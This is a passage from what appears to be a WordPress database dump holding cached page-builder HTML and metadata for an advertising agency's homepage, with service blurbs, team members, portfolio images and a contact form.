et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_3 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe007;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Business Strategy</span></h4>\n						<div class=\"et_pb_blurb_description\">Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_7  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_4 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00d;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Web Design</span></h4>\n						<div class=\"et_pb_blurb_description\">Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_8  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blurb et_pb_blurb_5 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe00f;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>Design/Video/Photo</span></h4>\n						<div class=\"et_pb_blurb_description\">Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_3 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_4\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_9  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_2 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">With the advent to this digital era, Unique traffic to your website, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_4 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_5\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_10  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_video et_pb_video_0\">\n				\n				\n				<div class=\"et_pb_video_box\"><iframe title=\"Digital Advertising - WhatTheHell? - Best Creative/Digital Agency\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/GQB6K7Dozms?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></div>\n				<div style=\"background-image:url(//i.ytimg.com/vi/GQB6K7Dozms/maxresdefault.jpg)\" class=\"et_pb_video_overlay\"><div class=\"et_pb_video_overlay_hover\"><a href=\"#\" class=\"et_pb_video_play\"></a></div></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_5 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_6 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_11  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_3 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Fearless Leaeders</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_4 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We do not fear trying new stuff and failure (we say learning). Meet the team of professionals enjoying their work and adding value to your project.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_7\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_12  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_team_member et_pb_team_member_0 et_animated clearfix  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_team_member_image et-waypoint et_pb_animation_off\"><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?w=1080&#038;ssl=1\" alt=\"Dhiraj Kumar\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?w=600&amp;ssl=1 600w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?resize=225%2C300&amp;ssl=1 225w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?resize=480%2C640&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 600px) 100vw, 600px\" data-lazy-src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?w=1080&#038;ssl=1\" alt=\"Dhiraj Kumar\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?w=600&ssl=1 600w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?resize=225%2C300&ssl=1 225w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg?resize=480%2C640&ssl=1 480w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /></noscript></div>\n				<div class=\"et_pb_team_member_description\">\n					<h4 class=\"et_pb_module_header\">Dhiraj Kumar</h4>\n					<p class=\"et_pb_member_position\">Founder</p>\n					\n					<ul class=\"et_pb_member_social_links\"><li><a href=\"https://www.linkedin.com/in/dhirajwth\" class=\"et_pb_font_icon et_pb_linkedin_icon\"><span>LinkedIn</span></a></li></ul>\n				</div> <!-- .et_pb_team_member_description -->\n			</div> <!-- .et_pb_team_member -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_13  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_team_member et_pb_team_member_1 et_animated clearfix  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_team_member_image et-waypoint et_pb_animation_off\"><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?w=1080&#038;ssl=1\" alt=\"Shubham Jha\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?w=600&amp;ssl=1 600w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?resize=225%2C300&amp;ssl=1 225w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?resize=480%2C640&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 600px) 100vw, 600px\" data-lazy-src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?w=1080&#038;ssl=1\" alt=\"Shubham Jha\" srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?w=600&ssl=1 600w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?resize=225%2C300&ssl=1 225w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-2.jpg?resize=480%2C640&ssl=1 480w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /></noscript></div>\n				<div class=\"et_pb_team_member_description\">\n					<h4 class=\"et_pb_module_header\">Shubham Jha</h4>\n					<p class=\"et_pb_member_position\">Marketing Director</p>\n					\n					<ul class=\"et_pb_member_social_links\"><li><a href=\"#\" class=\"et_pb_font_icon et_pb_facebook_icon\"><span>Facebook</span></a></li><li><a href=\"#\" class=\"et_pb_font_icon et_pb_linkedin_icon\"><span>LinkedIn</span></a></li></ul>\n				</div> <!-- .et_pb_team_member_description -->\n			</div> <!-- .et_pb_team_member -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_14  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_team_member et_pb_team_member_2 et_animated clearfix  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_team_member_image et-waypoint et_pb_animation_off\"><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?w=1080&#038;ssl=1\" alt=\"Sachin\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?w=600&amp;ssl=1 600w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?resize=225%2C300&amp;ssl=1 225w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?resize=480%2C640&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 600px) 100vw, 600px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?w=1080&#038;ssl=1\" alt=\"Sachin\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?w=600&ssl=1 600w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?resize=225%2C300&ssl=1 225w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-7.jpg?resize=480%2C640&ssl=1 480w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /></noscript></div>\n				<div class=\"et_pb_team_member_description\">\n					<h4 class=\"et_pb_module_header\">Sachin</h4>\n					<p class=\"et_pb_member_position\">Art Director</p>\n					\n					<ul class=\"et_pb_member_social_links\"><li><a href=\"#\" class=\"et_pb_font_icon et_pb_facebook_icon\"><span>Facebook</span></a></li></ul>\n				</div> <!-- .et_pb_team_member_description -->\n			</div> <!-- .et_pb_team_member -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_6 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_8 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_15  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_5 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">our Work</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_6 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_9 et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_1_3 et_pb_column_16  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint et_pb_has_overlay\">\n				\n				\n				<a href=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" class=\"et_pb_lightbox_image\" title=\"Packaging Design\"><span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design\" title=\"packaging design by what the hell\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design\" title=\"packaging design by what the hell\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript><span class=\"et_overlay\"></span></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_17  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_1 et_animated et-waypoint et_pb_has_overlay\">\n				\n				\n				<a href=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" class=\"et_pb_lightbox_image\" title=\"Packaging Design creative agency\"><span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&amp;ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript><span class=\"et_overlay\"></span></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_18  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_2 et_animated et-waypoint et_pb_has_overlay\">\n				\n				\n				<a href=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" class=\"et_pb_lightbox_image\" title=\"Creative graphic designing \"><span class=\"et_pb_image_wrap \"><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"Creative graphic designing \" title=\"Creative graphic designing \" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"Creative graphic designing \" title=\"Creative graphic designing \" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript><span class=\"et_overlay\"></span></span></a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_10\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_19  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_0 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"#\" data-icon=\"&#x45;\">View All</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_7 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_11 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_20  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_7 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_8 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_12 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_21  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_0 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"0\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/?s=captcha&#038;test=-1\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_0\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_0\" class=\"input\" value=\"\" name=\"et_pb_contact_name_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_0\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_0\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_0\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_0\" class=\"input\" value=\"\" name=\"et_pb_contact_email_0\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_0\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_0\" id=\"et_pb_contact_message_0\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"6b478f2599\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=captcha&amp;test=-1\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(667,392,'_et_pb_truncate_post_date','2021-06-21 11:25:52'),(668,392,'_et_builder_version','VB|Divi|4.5.6'),(669,392,'_et_pb_show_page_creation','off'),(670,392,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(674,396,'_edit_lock','1596567455:1'),(675,396,'_et_pb_use_builder','on'),(676,396,'_et_gb_content_width',''),(677,396,'amp_status',''),(678,396,'_edit_last','1'),(679,396,'_et_pb_post_hide_nav','default'),(680,396,'_et_pb_page_layout','et_right_sidebar'),(681,396,'_et_pb_side_nav','off'),(682,396,'_et_pb_built_for_post_type','page'),(683,398,'_menu_item_type','post_type'),(684,398,'_menu_item_menu_item_parent','0'),(685,398,'_menu_item_object_id','396'),(686,398,'_menu_item_object','page'),(687,398,'_menu_item_target',''),(688,398,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(689,398,'_menu_item_xfn',''),(690,398,'_menu_item_url',''),(691,396,'_et_pb_ab_subjects',''),(692,396,'_et_pb_enable_shortcode_tracking',''),(693,396,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"396\" /]'),(694,396,'_et_pb_custom_css',''),(695,396,'_et_pb_gutter_width','3'),(696,396,'_thumbnail_id','0'),(697,396,'_et_pb_first_image',''),(698,396,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_25 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_33 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_49  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_35 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our work</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_divider_2 et_animated et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_26 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_34\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_50  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_36 et_animated  et_pb_text_align_left 